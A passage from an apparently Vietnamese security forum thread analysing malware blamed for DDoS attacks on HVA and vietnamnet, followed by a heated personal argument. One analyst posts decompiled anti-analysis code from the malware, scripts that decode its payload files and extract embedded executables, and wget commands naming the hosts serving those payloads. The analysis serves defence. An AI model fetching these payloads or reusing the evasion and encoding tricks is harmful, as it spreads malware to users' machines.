thủ đích thực khác nữa mà các anh không biết đấy.

Theo em thấy thì dù AVG không tốt bằng Avira nhưng AVG rất giỏi trong việc quảng cáo nên bà con người Việt dùng hàng antivirus miễn phí thường chọn AVG thay vì Avira, dường như có xu hướng chuyển từ AVG sang Avast! nhưng AVG vẫn rất được tin dùng bởi nhiều người Việt. Mấy trò còn lại thì ấu trĩ thật.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Có một đoạn code này, em vừa đọc vừa cười muốn bể bụng. Đoạn code này mới 100%, vừa được mấy anh stl nhét thêm vào cái codebase *.manifest của mấy anh ấy. Code:

void __stdcall DetectHijackthisExe(int a1)
{
    HANDLE hSnapshot; // esi@2
    PROCESSENTRY32W pe; // [sp+10h] [bp-230h]@1
    unsigned int sanity; // [sp+23Ch] [bp-4h]@1

    sanity = (unsigned int)&pe ^ __security_cookie;
    while ( 1 )
    {
        hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        memset(&pe.cntUsage, 0, 0x228u);
        pe.dwSize = 556;
        if ( Process32FirstW(hSnapshot, &pe) )
        {
            do
            {
                if ( !lstrcmpiW(pe.szExeFile, L"hijackthis.exe") )
                    ExitProcess(0);
            }
            while ( Process32NextW(hSnapshot, &pe) );
        }
        CloseHandle(hSnapshot);
        Sleep(0xC8u);
    }
}

Tính làm cho Bolzano nhà ta thất nghiệp ha ? Nhưng lại code ngớ ngẩn như vậy: detect thấy hijackthis.exe, thay vì kill process hijackthis.exe thì chính mình lại đi exit.

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Nhóm STL sẽ không thể ngăn nổi việc dùng tool của mình đâu, cứ chạy đua với mình thì sẽ thấy :D . PS: Mình bỏ việc dùng HijackThis lâu rồi ;) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Tình hình là mấy ngày nay em ko vào được vietnamnet nữa rồi, kể cả www.vietnamnet.vn và vietnamnet.vn Chán thật

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

thuypv wrote:

Tình hình là mấy ngày nay em ko vào được vietnamnet nữa rồi, kể cả www.vietnamnet.vn và vietnamnet.vn Chán thật

Bạn kiểm tra thế nào ấy chứ mình vẫn vào bình thường mà :) .

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Ko vào được bạn à, thử hết rồi mình dùng mạng của viettel

Phân tích tính chất vài trận DDoS HVA vừa qua.

bolzano_1989 — GMT

Có khi nào địa chỉ IP của bạn bị chặn hay là máy tính của bạn bị nhiễm virus của STL chăng? Bạn gửi log như các hướng dẫn mình đã gửi trong chủ đề này, mình xem thử.

Phân tích tính chất vài trận DDoS HVA vừa qua.

quygia128 — GMT

bolzano_1989 wrote:

Có khi nào địa chỉ IP của bạn bị chặn hay là máy tính của bạn bị nhiễm virus của STL chăng? Bạn gửi log như các hướng dẫn mình đã gửi trong chủ đề này, mình xem thử.

Thực ra không phải vậy đâu anh ơi. Em đã test thử rồi máy nhà (FPT), quán cafe(quên xem nó mạng gì) và cả tiệm net (CMC) không nơi nào vào được vietnamnet anh à. Nghe mấy anh nói có cookies cũ thì vào được vậy ai có làm ơn gửi lên em thử cái :D cảm ơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

MÌNH DÙNG BẢN KIS 2011 BẢN QUYỀN, CHẮC LÀ KO BỊ STL ĐÂU

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

thuypv wrote:

MÌNH DÙNG BẢN KIS 2011 BẢN QUYỀN, CHẮC LÀ KO BỊ STL ĐÂU

chịu khó đọc lại topic này từ đầu đi bạn. KIS , AVG,.. bản quyền hay không bản quyền thực ra cũng chỉ tạo ra sự yên tâm trong tâm lý cho người sử dụng thôi.

Phân tích tính chất vài trận DDoS HVA vừa qua.

trycatch — GMT

thuypv wrote:

Ko vào được bạn à, thử hết rồi mình dùng mạng của viettel

Ái chà, mình vẫn vào bình thường nhưng sau khi clear cookies thì không vào được nữa.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN — GMT

Hì hì, lần này em gặp cục xương khó gặm nhất, bự bà cố luôn. Bao nhiêu tinh tuý của mấy anh stl dồn hết vào cái file rfc2616.txt này à ? Mình nó mang trong bụng gần 5-6 PE file vậy ? Hay lắm, size của rfc2616.txt sau khi decode ra chỉ vỏn vẹn 476KB. Nói mấy anh stl không tin, sợ em nói dóc. Thôi em gởi mấy anh vài đoạn script sau đọc đỡ buồn: Code:

//-------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeRfcTxt.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.0
// Purpose: Decode the Rfcxxx.txt files downloaded from:
//  1. http://news.pedto.com/rfc1945.txt
//  2. http://blogs.pinix.org/rfc1945.txt
//  3. http://analytics.dynn.info/rfc1945.txt
//  4. http://news.pedto.com/rfc2616.txt
//  5. http://blogs.pinix.org/rfc2616.txt
//  6. http://analytics.dynn.info/rfc2616.txt
//-------------------------------------------------------------
int i, j, size = FileSize();

if (size <= 0)
{
    MessageBox(idOk, "DecodeRfcTxt", "No file loaded or file empty.");
    return -1;
}

// Modify from 8th byte
for (i = 0, j = 0; i < size; i += 2, ++j)
{
    // Modify the current byte
    WriteUByte(j, ReadUByte(i) - 65 + 26 * (ReadUByte(i + 1) - 65));
}
DeleteBytes(j, size);

Thêm cái script này nữa: Code:

//----------------------------------------------------------------
//--- 010 Editor v3.2 Script File
//
// File: DecodeRwoqv.1sc
// Author: ThangCuAnh (TQN) 
// Revision: 1.1
// Purpose: Decode and extract the embedded PE files in rwoqv.exe
//----------------------------------------------------------------
char Mask[] = "ï¾ÞNullsoftInst '";
char strBin[255];

int i, j, iFiles, curFile, newFile;
int64 liPos, fSize;

// Check that a file is open
if (FileCount() == 0)
{
    MessageBox(idOk, "DecodeBin", "DecodeBin can only be executed when a file is loaded.");
    return -1;
}

// Save the file index of current file
curFile = GetFileNum();

// Find the embedded PE files
liPos = FindFirst(Mask);
if (liPos < 0)
{
    MessageBox(idOk, "DecodeBin", "Could not find the mask of embedded PE files");
    return -1;
}

liPos += 20;
liPos += 0x100; // stl coder modified code here
iFiles = ReadInt(liPos);
liPos += sizeof(int);

Printf("Number of embedded PE files %d - Start at 0x%LX", iFiles, liPos);

for (i = 0; i < iFiles; ++i)
{
    fSize = ReadInt(liPos);
    liPos += sizeof(int);
    SetSelection(liPos, fSize);
    CopyToClipboard();

    newFile = FileNew();
    FileSelect(newFile);    // force select new file
    PasteFromClipboard();

    // Decode the new file
    for (j = 0; j < FileSize(); ++j)
    {
        // Modify the current byte
        WriteUByte(j, ReadUByte(j) ^ (( j & 7) + 0x3E));    // stl coder modified code here
    }
    SPrintf(strBin, "File%d.bin", i + 1);
    strBin = InputSaveFileName("Save decoded PE as", "All files (*.*)", strBin, ".bin");
    FileSave(strBin);

    // Switch to old file
    FileSelect(curFile);

    // Seek to next embedded PE file
    liPos += fSize;
}

Và cái tracker.cmd cùi bắp luôn: Code:

@echo off

echo ==================================================================================================
echo Download cac file trojan, bot va DDOS config files cua stl malwares mao danh soft cua QuickTime
echo Cac ban gap 2 file nay: QTTask.exe va QTTask.dll thi kill va xoa ngay !!!!!!!!!!!!!!!!!!!!!!!!!!!!
echo ===================================================================================================
echo.

wget -t3 "http://news.pedto.com/rfc1945.txt" -O news.pedto.com_rfc1945.txt
wget -t3 "http://blogs.pinix.org/rfc1945.txt" -O blogs.pinix.org_rfc1945.txt
wget -t3 "http://analytics.dynn.info/rfc1945.txt" -O analytics.dynn.info_rfc1945.txt
wget -t3 "http://news.pedto.com/rfc2616.txt" -O news.pedto.com_rfc2616.txt
wget -t3 "http://blogs.pinix.org/rfc2616.txt" -O blogs.pinix.org_rfc2616.txt
wget -t3 "http://analytics.dynn.info/rfc2616.txt" -O analytics.dynn.info_rfc2616.txt

pause

Phân tích tính chất vài trận DDoS HVA vừa qua.

wỷnhỏ — GMT

hjx..... mấy anh/bác ơi....:( vietnamnet lại.....đơ cu lơ rùi :-|S :-|S :-|S chán thật đấy....sao chúng nó cứ chơi cái mãi cái trang này mà không biết chán :(:(:(

Phân tích tính chất vài trận DDoS HVA vừa qua.

mv1098 — GMT

Thông báo: Hôm nay em đi mua 1 desktop cho 1 người quen ở Trần Anh (292 Tây Sơn), khi về setup thêm Avira thì thấy thông báo bắt đc Malware lây nhiễm vào file justcheck và 1 số file khác trong thư mục java, lỡ bị xoá mất mà không có bản ghost đi kèm máy nên em ko copy đc mẫu về. Như vậy 100% máy tính được cài đặt tại Trần Anh khi bán đều bị nhiễm malware, anh em chú ý Bro tech nào của Trần Anh tham gia HVA thì chú ý giúp em nhé

Phân tích tính chất vài trận DDoS HVA vừa qua.

namkaka — GMT

mv1098 wrote:

Thông báo: Hôm nay em đi mua 1 desktop cho 1 người quen ở Trần Anh (292 Tây Sơn), khi về setup thêm Avira thì thấy thông báo bắt đc Malware lây nhiễm vào file justcheck và 1 số file khác trong thư mục java, lỡ bị xoá mất mà không có bản ghost đi kèm máy nên em ko copy đc mẫu về. Như vậy 100% máy tính được cài đặt tại Trần Anh khi bán đều bị nhiễm malware, anh em chú ý Bro tech nào của Trần Anh tham gia HVA thì chú ý giúp em nhé

mình xác nhận thông tin này là đúng vì mình cũng mua laptop tại trananh ! mấy tay kỹ thuật viên đó ghost cho mình bản win dùng thử 30 ngày sau khi cài phần mềm AVIRA nó báo nhiễm virus dòng sality may mà AVIRA update đã diệt sạch được nó nhưng toàn bộ các file EXE phần mềm mình cài đặt vào máy đã bị lũ sality này nuốt chửng liều có phải trong bản ghost trananh sử dụng có cài virus

Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll — GMT

TQN wrote:

Mấy anh stl học lại kỹ thuật code dùng zlib đi nhé ! Em khuyên thành thật ấy. Dùng zlib từ đó tới giờ mà không biết cách uncompress trên memory à ? Ai lại đi chơi lấy buffer zip ghi vào temp file rồi dùng hàm của zlib uncompress, rồi lại ghi vào temp file khác, rồi lại đọc lên. Lúc em RCE, em nói quái, sao đi lòng vòng vầy nè ? Cuối cùng "thì ra em đã hiểu", mấy anh chỉ biết dùng mấy hàm zlib cho file thôi ! Cho em rút lại lời khen thằng coder C++ của mấy anh nhé, code vầy tệ lắm. Gặp em là team leader của nó thì em sạc nó thẵng tay rồi. PS: Làm cái gì mà căm danlambaovn.blogspot.com thế, DDOS hoài không chán à ?

NÓNG QUÁ, nóng không chịu được... thật là lạ, 3 anh em có hết có 2 chai vodka thôi mà ...!? Thiệt đúng là đám virus "mèo què" này rơi vào tay một con người từng khẳng định "chưa viết virus bao giờ" lại còn đòi "đưa ra bằng chứng" , dám khẳng định trên tầm anonymost và lulzec... thiệt là không xứng, không xứng mà ! :-O :-O tưởng bộ, người nào có nội công thâm hậu mà... chưa từng bỏ thời gian chọc ngoáy, nghịch ngợm này nọ. TQN là ngoại lệ sao !? Thích phân tích thì cứ phân tích đi, sao phải chê bai, mạt sát, chửi bới... Code decode kìa.. họ đã có encode thì tất yếu phải có decode khi họ kích hoạt rồi, TQN giành tặng họ làm chi nữa !? Thật khiến người ta muốn "OẸ" quá mà. @Conmale: Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà -:|- @TQN: Có mẫu mới rồi kìa, TQN lại phải vất vả rồi :D . Tớ dám chắc là so với Anonymoust và lulzec thì TQN chưa thể bằng họ đâu :D Xin lỗi Ban quản trị diễn đàn và mọi người nha, đừng "gán" cho tớ cái danh STL hay bênh vực ai cả. Tớ là dân kinh doanh nhưng cũng thích kĩ thuật lắm. Ban quản trị diễn đàn cho tớ gác nhờ bài này nhé ./. Cảm ơn !

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

s3ll wrote:

TQN wrote:

Mấy anh stl học lại kỹ thuật code dùng zlib đi nhé ! Em khuyên thành thật ấy. Dùng zlib từ đó tới giờ mà không biết cách uncompress trên memory à ? Ai lại đi chơi lấy buffer zip ghi vào temp file rồi dùng hàm của zlib uncompress, rồi lại ghi vào temp file khác, rồi lại đọc lên. Lúc em RCE, em nói quái, sao đi lòng vòng vầy nè ? Cuối cùng "thì ra em đã hiểu", mấy anh chỉ biết dùng mấy hàm zlib cho file thôi ! Cho em rút lại lời khen thằng coder C++ của mấy anh nhé, code vầy tệ lắm. Gặp em là team leader của nó thì em sạc nó thẵng tay rồi. PS: Làm cái gì mà căm danlambaovn.blogspot.com thế, DDOS hoài không chán à ?
NÓNG QUÁ, nóng không chịu được... thật là lạ, 3 anh em có hết có 2 chai vodka thôi mà ...!? Thiệt đúng là đám virus "mèo què" này rơi vào tay một con người từng khẳng định "chưa viết virus bao giờ" lại còn đòi "đưa ra bằng chứng" , dám khẳng định trên tầm anonymost và lulzec... thiệt là không xứng, không xứng mà ! :-O

Câu lập luận trên là nguỵ biện. Người "chưa viết" virus nhưng vững lập trình, vững hợp ngữ, vững cấu trúc của hệ điều hành và quen thuộc với những trò chơi giấu, xoá, mạo danh...v...v... của malware thì vẫn có thể lật tẩy malware rất dễ dàng. Đoạn bồ quote ở trên từ bài của TQN chẳng có chỗ nào nói là TQN khẳng định trên tầm anonymost và lulzec hết. Trên diễn đàn này TQN cũng chưa hề "khẳng định" mình trên tầm ai hết (ngoài chuyện trên tầm stl). Đừng chơi trò nhét chữ vô miệng người khác một cách hồ đồ như vậy. Nhét chữ vô miệng người khác rồi tự kết luận xứng hay không xứng chính là trò nguỵ biện.

s3ll wrote:

:-O tưởng bộ, người nào có nội công thâm hậu mà... chưa từng bỏ thời gian chọc ngoáy, nghịch ngợm này nọ. TQN là ngoại lệ sao !? Thích phân tích thì cứ phân tích đi, sao phải chê bai, mạt sát, chửi bới... Code decode kìa.. họ đã có encode thì tất yếu phải có decode khi họ kích hoạt rồi, TQN giành tặng họ làm chi nữa !? Thật khiến người ta muốn "OẸ" quá mà.

Nếu TQN phân tích và phê bình sai thì hãy dùng kỹ thuật mà chỉnh TQN một mẻ. Đừng có chuyển hệ sang chỗ phê bình TQN vì TQN phê bình những lỗi quá sơ đẳng của stl. Đúng ra là phải cám ơn TQN vì chính những phê bình ấy chính là "vẽ đường cho hưu chạy" mà sao còn trách TQN? TQN phân tích thì quá nhiều rồi, bồ thấy chưa đủ hay sao mà còn đòi "cứ phân tích đi"? Trong suốt chủ đề này và một số chủ đề khác, TQN đã phân tích và có đủ thẩm quyền để chửi. Không những chửi những thứ buồn cười, những tiểu xảo ngớ ngẩn mà còn chửi những trò đồi bại của những sản phẩm mà stl tạo ra. Bồ còn có trò nguỵ biện khác là thay mặt "người ta" để "oẹ". Bồ muốn "oẹ" thì bồ cứ việc nhưng đừng "oẹ" giùm người khác. Cái trò tự đại diện đám đông là cái trò ăn vô trong máu rồi phải không? Từ khi bồ đăng ký nick trên HVA này, bồ đã viết những gì? Zero! Bồ đã dùng được một tí kỹ thuật nào để phản bác? Zero! Vậy bồ lấy tư cách gì để "oẹ"?

s3ll wrote:

@Conmale: Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà -:|-

Cái tiêu đề thế nào không quan trọng cho lắm. Cái quan trọng là nội dung của nó. Việc HVA bị DDoS là điểm xuất phát và không phải là điểm kết thúc. Từ chỗ HVA bị DDoS (bị ddos như thế nào, do ai ddos, có những ai khác bị ddos và tình trạng này sẽ đi về đâu....) đến chỗ những nạn nhân khác bị tấn công và những máy tính vô tội bị biến thành zombies... đều nằm trong chủ đề này để khai triển. Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Hôm qua tớ nhận được mail từ dịch vụ hosting bên Đức. Họ cho biết họ sẽ hỗ trợ chống DDoS miễn phí cho server của HVA và sẽ làm việc trực tiếp với những nhà chức trách để dẹp bỏ nguồn DDoS này. Tớ chỉ phì cười một mình và gởi mail cám ơn họ. Nghĩ lại thì thấy chua chát. Ngay cả một đám hosting thương mại còn phản ứng vì một khách hàng bé nhỏ như HVA vậy mà bao nhiêu cơ quan ngôn luận, bao nhiêu cơ quan hữu trách của một quốc gia thì....tịt. Đúng là "tự do và văn minh" đến độ ai muốn làm "do sở thích" thì làm =)) .

s3ll wrote:

@TQN: Có mẫu mới rồi kìa, TQN lại phải vất vả rồi :D . Tớ dám chắc là so với Anonymoust và lulzec thì TQN chưa thể bằng họ đâu :D Xin lỗi Ban quản trị diễn đàn và mọi người nha, đừng "gán" cho tớ cái danh STL hay bênh vực ai cả. Tớ là dân kinh doanh nhưng cũng thích kĩ thuật lắm. Ban quản trị diễn đàn cho tớ gác nhờ bài này nhé ./. Cảm ơn !

Sao bồ biết có mẫu mới hay vậy? Bồ là dân "kinh doanh" nhưng rảnh để theo cái vụ "mèo què" này và để đôi chối, biện bác cho mớ "mèo què" sao? Việc TQN không bằng Anonymoust và lulzec thì chưa biết nhưng việc TQN phê bình những thứ ngớ ngẩn của stl thì đã quá rõ. Cũng nên công bằng cho TQN một tí vì TQN cũng đã nhiều lần khen stl nữa. Bồ không phải là stl hay chính là stl không thành vấn đề. Vấn đề quan trọng nằm ở chỗ bồ đăng ký nick để phản ứng một cách thiếu kỹ thuật và đầy nguỵ biện với những người đang vạch mặt "mèo què". Có những thứ mà nguỵ biện và giả dối cũng không thể dùng che giấu và biện hộ được.

Phân tích tính chất vài trận DDoS HVA vừa qua.

TMDTHBC — GMT

s3ll wrote:

:-O tưởng bộ, người nào có nội công thâm hậu mà... chưa từng bỏ thời gian chọc ngoáy, nghịch ngợm này nọ. TQN là ngoại lệ sao !? Thích phân tích thì cứ phân tích đi, sao phải chê bai, mạt sát, chửi bới... Code decode kìa.. họ đã có encode thì tất yếu phải có decode khi họ kích hoạt rồi, TQN giành tặng họ làm chi nữa !? Thật khiến người ta muốn "OẸ" quá mà.

"oẹ" là đúng chính mọi người cũng "oẹ" đấy s3ll... "oẹ" vì trình độ hiểu biết của cậu và kiến thức của cậu "đủ sức so sánh và đánh giá được việc làm của HVA"

s3ll wrote:

@Conmale: Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà -:|-

@ s3ll: Cần phải có time để đọc từ page 1 cậu nhé... mọi thành viên ở đây đã nêu rõ mình làm việc gì và vì cái gì rồi.

s3ll wrote:

@TQN: Có mẫu mới rồi kìa, TQN lại phải vất vả rồi :D . Tớ dám chắc là so với Anonymoust và lulzec thì TQN chưa thể bằng họ đâu :D Xin lỗi Ban quản trị diễn đàn và mọi người nha, đừng "gán" cho tớ cái danh STL hay bênh vực ai cả. Tớ là dân kinh doanh nhưng cũng thích kĩ thuật lắm. Ban quản trị diễn đàn cho tớ gác nhờ bài này nhé ./. Cảm ơn !

cậu kinh doanh gì, nước bọt phải chăng... hay 1 lúc say xỉn rồi bị kích động thần kinh nên nói nhăng nói cuội. Phàm ở đời trâu buộc ghét trâu ăn, đừng tự tin về kiến thức của mình để quy chụp người khác. Đọc kỹ cậu nhé: http://www.thanhnien.com.vn/Pages/20110907/Dau-hieu-kin-cua-tram-cam.aspx Đừng phủ nhận việc làm của người khác kẻo bị RE đấy.

Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll — GMT

@Conmale và TMDTHBC : Có vẻ sở thích “quy kết” nhỉ. Nào là “nhét chữ vô miệng” hay là “ngụy biện”, “quy chụp”… gì gì đó nữa ?

Conmale wrote:

Đoạn bồ quote ở trên từ bài của TQN chẳng có chỗ nào nói là TQN khẳng định trên tầm anonymost và lulzec hết. Trên diễn đàn này TQN cũng chưa hề "khẳng định" mình trên tầm ai hết (ngoài chuyện trên tầm stl). Đừng chơi trò nhét chữ vô miệng người khác một cách hồ đồ như vậy. Nhét chữ vô miệng người khác rồi tự kết luận xứng hay không xứng chính là trò nguỵ biện.

- Rõ ràng, ai cũng hiểu được nếu không có dẫn chứng trên đó thì có thể tôi không cho vào… Vì sự thật đúng là như vậy đó, tôi chả mất công sức và thời gian đâu để dò tìm lại từng bài post của TQN làm gì cả, điều này TQN là người hiểu rõ nhất… dân làm việc trong lĩnh vực IT Việt Nam chạy đua theo cái “ngọn” của ngành công nghệ mà, phải không ??? Trên thế giới phát triển ra sản phầm phần cứng dựa trên khoa học cơ bản rồi, để rồi dân ta đua nhau cày cày phát triển ứng dụng trên đó !? Lulec thì tôi không biết thành viên, tuy nhiên tôi dám so sánh Anonymoust và “TQN - ở diễn đàn hva này” thì tôi phải dám chắc trình độ của họ hơn, và tôi cũng biết thành viên của họ có người đang làm trong lĩnh vực nghiên cứu đa lõi trong sản phẩm ở Intel, Micro… Trans. Chứ không chỉ dừng lại ở việc tìm hiểu bộ vi xử lý, coding,… trong lĩnh vực RCE thậm chí lớn hơn nữa là “RE” vậy. Đó là lý do tôi đánh giá cao anonymoust hơn đó anh Conmale à !

Conmale wrote:

Bồ còn có trò nguỵ biện khác là thay mặt "người ta" để "oẹ". Bồ muốn "oẹ" thì bồ cứ việc nhưng đừng "oẹ" giùm người khác. Cái trò tự đại diện đám đông là cái trò ăn vô trong máu rồi phải không? Từ khi bồ đăng ký nick trên HVA này, bồ đã viết những gì? Zero! Bồ đã dùng được một tí kỹ thuật nào để phản bác? Zero! Vậy bồ lấy tư cách gì để "oẹ"? Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Nếu bồ cho rằng việc tấn công HVA là "do sở thích" thì việc tấn công vietnamnet là do đâu? Thật khôi hài khi thấy một đám người bỏ hàng đồng tiền bạc, thời gian, nhân lực ra để chơi trò "do sở thích" và cả một đất nước có cả mấy trăm đầu báo cũng im như thóc. Hôm qua tớ nhận được mail từ dịch vụ hosting bên Đức. Họ cho biết họ sẽ hỗ trợ chống DDoS miễn phí cho server của HVA và sẽ làm việc trực tiếp với những nhà chức trách để dẹp bỏ nguồn DDoS này. Tớ chỉ phì cười một mình và gởi mail cám ơn họ. Nghĩ lại thì thấy chua chát. Ngay cả một đám hosting thương mại còn phản ứng vì một khách hàng bé nhỏ như HVA vậy mà bao nhiêu cơ quan ngôn luận, bao nhiêu cơ quan hữu trách của một quốc gia thì....tịt. Đúng là "tự do và văn minh" đến độ ai muốn làm "do sở thích" thì làm.

- Tôi nói “ọe” giùm người khác bao giờ vậy admin “Conmale” ??? Mà đằng ấy muốn tôi đưa ra kĩ thuật để “phản bác” cái gì cơ chứ ??? Bên trên tôi có nói nguyên văn như sau “Tôi thấy nên đổi tên luồng bài này thành "Phân tích kĩ thuật vài trận DDoS HVA vừa qua." thì hợp lý hơn, chứ nếu để là "Phân tích tính chất vài trận DDoS HVA vừa qua." thì ít nhiều cũng có phân tích, bóc tách vì sao họ tấn công hvaonline !? Do sở thích chăng ? Rõ ràng là ai cũng biết mà” . Tôi còn sử dụng dấu “chấm hỏi” kìa… Những bạn nào đọc bài viết đó của tôi cũng có thể hiểu được ý tôi suy nghĩ rằng “họ không phải là do sở thích mà làm”, nên bồ Conmale đừng có dựa vào cái cụm từ đó để mà suy diễn ra này nọ nha. Một con người mà “chi li”, để ý đến từng câu, từng chữ của người khác mà lại có thể đánh giá như vậy sao ??? Thật khiến cho người ta buồn cười quá mà.

Conmale wrote:

Nếu TQN phân tích và phê bình sai thì hãy dùng kỹ thuật mà chỉnh TQN một mẻ. Đừng có chuyển hệ sang chỗ phê bình TQN vì TQN phê bình những lỗi quá sơ đẳng của stl. Đúng ra là phải cám ơn TQN vì chính những phê bình ấy chính là "vẽ đường cho hưu chạy" mà sao còn trách TQN? TQN phân tích thì quá nhiều rồi, bồ thấy chưa đủ hay sao mà còn đòi "cứ phân tích đi"? Trong suốt chủ đề này và một số chủ đề khác, TQN đã phân tích và có đủ thẩm quyền để chửi. Không những chửi những thứ buồn cười, những tiểu xảo ngớ ngẩn mà còn chửi những trò đồi bại của những sản phẩm mà stl tạo ra.

- Không “vẽ đường cho hươu chạy” thì làm sao có yếu tố kĩ thuật để mạt sát, chửi bới… tùm lum trong diễn đàn vậy. Chưa xét về yếu tố mục đích của họ là gì , chỉ xét về mặt kĩ thuật thôi đi… cho dù có là người đi trước, hay giỏi hơn người ta mấy mươi lần đi chăng nữa. Tôi đâu có phản đối việc TQN đã từng đưa ra 2 chủ đề phân tích kĩ thuật VX của STL, phải không ??? Nhưng dựa vào đó để mà đánh giá các vấn đề khác… không phải là khiến cho người ta muốn “ọe” hay sao ???

TMDTHBC wrote:

cậu kinh doanh gì, nước bọt phải chăng... hay 1 lúc say xỉn rồi bị kích động thần kinh nên nói nhăng nói cuội. Phàm ở đời trâu buộc ghét trâu ăn, đừng tự tin về kiến thức của mình để quy chụp người khác. Đọc kỹ cậu nhé: http://www.thanhnien.com.vn/Pages/20110907/Dau-hieu-kin-cua-tram-cam.aspx Đừng phủ nhận việc làm của người khác kẻo bị RE đấy.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok — GMT

S3ll nhảy vô chỉ để viết nhảm nhí, lạc hướng vẫn đề (chính s3ll cũng đã nói vậy). Đề nghị Mod xóa bài đã gửi của s3ll vì nó chẳng giá trị gì, chỉ lôi kéo thành viên vào cuộc tranh cãi vô bổ. Lưu ý một điểm : s3ll biết có mẫu mới của stl trong khi mọi người chẳng ai biết. Xin xóa luôn bài này. Chân thành cảm ơn!

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

@s3ll : gớm quá, từ từ đã nào anh s3ll . chưa gì anh đã tung ra bí mật là nhóm " Alomynist " gì đó của anh có ngừi đang nghiên "kứu" "đa nuồng" trong " phần kứng" của Intel,Micro..v.v. . nhớ công an họ đến họ bắt tui thì sao ? :P . => anh viết tùm lum ghì đọc thêm nhức đầu anh. đa luồng và hệ quy chiếu "vũ trụ" ? thế nào là lập trình trên không thời gian ? s3ll biết khô ? mà dám hoa chân múa tay nơi này ? @serlokkok : xin bác chớ nóng. s3ll nhảm nhí vì thiếu kinh nghiệm vì vậy cứ để những bài viết của anh ta ở đây, để sau này khi lớn hơn, biết khiêm nhường hơn anh ta sẽ đọc lại và email xin lỗi mọi người có liên quan trong bài viết của anh ấy, bác à .

Phân tích tính chất vài trận DDoS HVA vừa qua.

s3ll — GMT

Sherlockok wrote:

S3ll nhảy vô chỉ để viết nhảm nhí, lạc hướng vẫn đề (chính s3ll cũng đã nói vậy). Đề nghị Mod xóa bài đã gửi của s3ll vì nó chẳng giá trị gì, chỉ lôi kéo thành viên vào cuộc tranh cãi vô bổ. Lưu ý một điểm : s3ll biết có mẫu mới của stl trong khi mọi người chẳng ai biết. Xin xóa luôn bài này. Chân thành cảm ơn!

Đó, tôi đã xin lỗi đến 2 lần rồi mà Sherlockok vẫn không thông cảm cho tôi :D . Nhưng xét trên khía cạnh với tiêu đề "Phân tích tính chất vài trận DDoS HVA vừa qua." của luồng bài viết này thì tôi nghĩ nó cũng không phải quá là lạc chủ đề lắm đâu, Sherlockok để ý kĩ thì còn có những bài lạc chủ đề "Phân tích" hơn của tôi kìa. Mặt khác, tôi nghĩ đây không phải là "cãi nhau" như Sherlockok nói đâu. Chúng ta chỉ đang tranh luận thôi mà. Mỗi người đọc lại có một cách nghĩ riêng nên Sherlockok đừng có đánh đồng mọi việc như vậy.

Sherlockok wrote:

Lưu ý một điểm điểm : s3ll biết có mẫu mới của stl trong khi mọi người chẳng ai biết.

Câu nói này của bạn làm mình nhớ đến môt việc, trên diễn đàn virusvn.com ... Có 2 bạn là nhân viên của CMCInfosec và nhân viên của BKAV tranh cãi nhau về các biến thể của mẫu "GoogleCrashHandle", người của CMC thì nói nó đúng là mẫu đã thực hiện DDoS vào vietnamnet.vn , còn người của BKAV lúc đó lại phủ nhận điều này, trong khi các thành viên của diễn đàn đó phải yêu cầu nhân viên của CMCInfoSec đưa ra mẫu, rùi bằng chứng... thì họ mới tin... Tôi nghĩ rằng lúc đó CMC có mãu và phân tích, chứ chưa có đủ yếu tố kĩ thuật để khẳng định 100% rằng đó chính là mẫu đã tấn công vào vietnamnet.vn, và 1 công ty nước ngoài đã thực hiện việc monitor này trong lúc logo.jpg vẫn còn tồn tại trên oxdex.com rồi.. Rốt cục thì đúng mẫu đó là mẫu đã thực hiện DDoS vào vietnamnet.vn trong một thời gian đó... :D Và tất nhiên, việc bạn Sherlockok khẳng định ngoài tôi ra thì "mọi người chẳng ai biết " thật là chưa đúng lắm mà. Có lẽ nhiều người họ biết nhưng họ không thông báo lên, và có thể họ không thích đưa mãu lên... Chả phải TQN và các bạn khác đã và đang có các HTTrack để thường xuyên theo dõi đó sao :D . Mỗi người họ lại có một Track riêng mà, đâu có ai giống ai 100% đâu Sherlockok nhỉ Xin lỗi các thành viên của diễn đàn một lần nữa nha. Cảm ơn!

